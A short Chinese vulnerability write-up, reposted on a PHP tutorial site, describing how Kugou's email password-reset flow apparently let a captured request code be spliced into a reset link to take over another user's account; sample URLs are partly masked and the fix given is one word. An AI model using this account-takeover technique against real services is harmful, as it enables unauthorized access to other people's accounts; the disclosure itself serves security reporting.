来源:自学PHP网 时间:2015-04-17 10:15 作者: 阅读:次
[导读] 1,先注册个用户测试,正常登录时点忘记密码,选择邮箱找回密码得到重置密码连接http://www.kugou.com/newuc/user/resetpwd/code=EE0544XXXXX4CEBB2E41E56C8E0A6413E43FA3FC19B9E0109DC39CD44C7690639226405CB88......
|
1,先注册个用户测试,正常登录时点忘记密码,选择邮箱找回密码得到重置密码连接
http://www.kugou.com/newuc/user/resetpwd/code=EE0544XXXXX4CEBB2E41E56C8E0A6413E43FA3FC19B9E0109DC39CD44C7690639226405CB880FC5C514494DB1424138BBEE12128F8DFFA51BE00B1B03EDFAF2CF5939DF58D006AD7B87D360C02F506673E30A239B3E70E7D4D1C7A3221E867004F138738844FED20CB18DCB38C9394AAXXXXXXX3909CAE
 2,选定一个目标用户,用户名为(123),登录时依然点忘记密码,在找回密码处填写目标用户名123,然后下一步。
 3,选择邮箱找回,点立即发送,并抓包。
 抓包得到:
POST /newuc/user/sendemail/code=EE0544E28BxxxxxxxxE226A370EBF23FC56592BFEC3962E8156A71054BE3594F143AEF142A1425AE5F09E961A040DE6F90F8F305C5E866A8A4EF00DB71289745F6F08CAA790F5AA67060541354E57E71BE58CE00B80930
此时,抓包得到的code只需要跟之前用自己的邮箱得到的连接组合一下就可以重置用户123
的密码了。组合得到:
http://www.kugou.com/newuc/user/resetpwd/code=EE0544E28Bxxxxxxxxx6A370EBF23FC56592BFEC3962E8156A71054BE3594F143AEF142A1425AE5F09E961A040DE6F90F8F305C5E866A8A4EF00DB71289745F6F08CAA790F5AA67060541354E57E71BE58CE00B80930
5,重置密码后登陆:
 修复方案:
权限验证 |
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com
